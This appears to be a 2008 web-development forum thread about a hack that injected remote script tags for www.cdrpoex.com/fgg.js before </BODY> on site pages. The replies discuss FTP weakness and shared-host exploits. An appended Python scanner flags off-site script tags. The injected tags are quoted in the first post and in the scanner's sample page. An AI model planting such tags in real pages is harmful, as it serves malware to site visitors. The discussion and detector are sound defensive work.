www.cdrpoex.com/fgg.js site hack

Hi All

Has anybody else been caught out by a site/ftp hack that puts the following
(or similar) next to the </BODY> in all of your root pages:

<script src=http://www.cdrpoex.com/fgg.js </script><script
src=http://www.cdrpoex.com/fgg.js </script><script
src=http://www.cdrpoex.com/fgg.js </script>

Have they done this purely by getting the FTP password or is there another
way in?

Only I have our FTP password so I'm thinking that it is down to our ISP
rather than our band of 3.


Re: www.cdrpoex.com/fgg.js site hack

On Sat, 26 Jul 2008 16:16:58 +0100, Laphan put finger to keyboard and


FTP is horribly insecure, so that's the most likely route in. If
you're using a shared webhost, the other possibility is some form of
exploit run on the server that allows users to access and modify other
users' content.

Obviously, you should change your FTP password immediately (I assume
you've already done that), but if at all possible you should stop
using FTP and switch to SFTP instead. If your host doesn't support
that, then strongly consider moving - if they're lax enough on
security to not support SFTP, then it's quite likely that they're lax
in other areas which could create other vulnerabilities.


Re: www.cdrpoex.com/fgg.js site hack

 > FTP is horribly insecure,

But extremely secure compared to some PHP code out there in the wild...

Yet I strongly suggest to stop using FTP and switch to SFTP. But don't
assume that FTP was the way they got in (yet).

John Bokma                                      http://johnbokma.com/

AISE/AWW/SEO/web development forum:       http://seo-expert-wiki.com/

Re: www.cdrpoex.com/fgg.js site hack


The only time I've ever had a site hacked (happened twice) it was on a
shared host and was down to a problem with the hosting company (which I
think Mark's reply alluded to). I would be inclined to notify your hosting
company and ask them for an explanation because the fault/breach may be at
their end.
Brian Cryer

Re: www.cdrpoex.com/fgg.js site hack


Yes, I have had multiple sites affected by this. It is not SQL
injection because one of my sites is classic asp with no database. The
host suspects that because I was using the dictionary object that the
bot or whatever it is impersonated the frontpage server extensions to
access all of the files in the directory and insert this garbage,
which, btw, I picked up some nasty ad/spyware and viruses from these
scripts. I am so tired of this. For every step forward there is some
parasite out there making life difficult and I would love to sue them
for the dozens of hours I have spent cleaning up about 15 different
sites on different servers.
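
Added example, not part of any post in this thread: a Python check for the injection quoted in the first post. It flags `<script src=...>` tags that load from hosts outside an allowlist and notes whether they sit next to `</BODY>`. The function names, the allowlisted host `cdn.example.com` and the sample page are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# <script ... src=VALUE, quoted or not. The tag quoted in the thread has no
# closing '>' before </script>, so the pattern does not require one.
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*(["\']?)([^"\'\s>]+)\1', re.I)
BODY_CLOSE = re.compile(r'</body\s*>', re.I)

def find_foreign_scripts(html, allowed_hosts, window=600):
    """Return [(host, url, count, near_body_close)] for off-site script tags."""
    closes = [m.start() for m in BODY_CLOSE.finditer(html)]
    body_end = closes[-1] if closes else len(html)
    seen = {}
    for m in SCRIPT_SRC.finditer(html):
        url = m.group(2)
        if not re.match(r'(?:https?:)?//', url, re.I):
            continue  # relative URL: served from the site itself
        host = (urlparse(url).hostname or '').lower()
        if host in allowed_hosts:
            continue
        count, near = seen.get((host, url), (0, False))
        near = near or abs(m.start() - body_end) <= window
        seen[(host, url)] = (count + 1, near)
    return sorted((h, u, c, n) for (h, u), (c, n) in seen.items())

def scan_tree(root, allowed_hosts, patterns=("*.htm", "*.html", "*.asp", "*.php")):
    """Scan page sources under root; return {relative_path: findings}."""
    report = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            text = path.read_text(encoding="latin-1")  # decodes any byte value
            hits = find_foreign_scripts(text, allowed_hosts)
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

# Constructed sample: a local script, an allowlisted CDN script, and the
# injected run from the first post placed just before </BODY>.
SAMPLE = (
    '<html><head><script src="js/menu.js"></script>\n'
    '<script src="https://cdn.example.com/lib.js"></script></head>\n'
    '<body><p>Home</p>\n'
    '<script src=http://www.cdrpoex.com/fgg.js </script><script\n'
    'src=http://www.cdrpoex.com/fgg.js </script><script\n'
    'src=http://www.cdrpoex.com/fgg.js </script></BODY></html>\n'
)
if __name__ == "__main__":
    print(find_foreign_scripts(SAMPLE, {"cdn.example.com"}))
```

Running `scan_tree` against a local copy of the web root with the hosts the site legitimately loads scripts from lists every page that still carries an unexpected tag, which helps confirm a clean-up is complete.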
